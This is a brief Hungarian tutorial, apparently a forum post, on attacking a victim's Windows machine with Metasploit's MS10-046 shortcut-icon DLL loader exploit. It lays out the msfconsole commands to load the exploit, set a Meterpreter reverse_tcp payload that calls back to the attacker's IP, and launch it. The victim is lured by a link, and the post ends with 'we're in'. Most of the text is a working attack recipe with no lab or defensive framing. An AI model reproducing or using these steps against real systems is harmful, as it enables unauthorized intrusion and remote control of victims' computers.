Az exploitot megtaláljuk a Metasploitban.
Metasploit Letöltés: http://metasploit.com/
A támadás úgy fog kinézni hogy az áldozatnak elküldünk egy linket, amit ha megnyit feltöltődik a gépére a DLL és LNK.
Nézzük meg most gyakorlatban.Nyissuk meg az msfconsole-t. Aztán:
use windows/browser/ms10_046_shortcut_icon_dllloader
Ezután be kell állítani a payloadot vagyis, hogy mit akarunk csinálni ezen az exploiton keresztül.Én most a meterpreter shell-t fogom használni.
set payload windows/meterpreter/reverse_tcp
A payload-nak meg kell adni hogy hova kapcsolódjon vissza:
set lhost ip címed
Még meg lehet adni bizonyos opciókat pl. hogy milyen host-on hallgatózzon (srvhost) stb. de nekem most így is menni fog..
exploit
És ha minden jól megy akkor bent is vagyunk. :)